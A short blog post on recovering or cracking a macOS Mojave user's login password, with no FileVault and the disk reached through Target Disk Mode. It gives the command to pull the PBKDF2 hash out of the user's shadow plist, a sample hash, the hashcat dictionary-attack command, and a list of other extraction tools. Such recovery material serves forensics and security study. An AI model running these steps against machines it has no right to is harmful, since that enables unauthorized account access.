tinyapps.org / blog

Crack Mac user password #

Environment

• Target and attack Macs both running macOS Mojave 10.14.6
• FileVault not enabled on target (see Cracking FileVault 2 (HFS+ or APFS) for cracking FileVault-encrypted volumes)
• Target Mac connected to attack Mac via Target Disk Mode

Extract hash

sudo ./plist2hashcat.py /Volumes/Target/var/db/dslocal/nodes/Default/users/username.plist

user:$ml$28328$7215a1faa91e6196fb53884c4320970d9705ae6f19e5b50e0a24243708629a9b$8e0588decbdb347e0b909a7a1b1bc9470fe7dd37e09a64f9d02b82cfba91116b13d7c172b5a65683ac8d2c873324b8d82255a51ced0792656e766fa1a9c23994

Save the output without the leading "user:" (otherwise you'll need to specify --username when running hashcat) to hash.txt

Start cracking

hashcat -a 0 -m 7100 --status -o found.txt hash.txt wordlist.txt

More

Additional scripts and a program that accomplish the same goal as plist2hashcat.py (i.e., extracting hashcat-compatible hashes from binary plist shadow files generated by OS X 10.8 and up (SALTED-SHA512-PBKDF2)):

• mac2john.py (formerly "ml2john.py")
• Empire/lib/modules/python/collection/osx/hashdump.py
• osx_hashdump.py
• macOS-HashExtractor
• DaveGrohl

The process can also be done manually:

• Detailed walkthru by klanomath
• How to Extract OS X Mavericks Password Hash for Cracking With Hashcat

See also Recovering saved macOS user passwords and Cracking FileVault 2 (HFS+ or APFS).

/mac | Oct 30, 2019

Subscribe or visit the archives.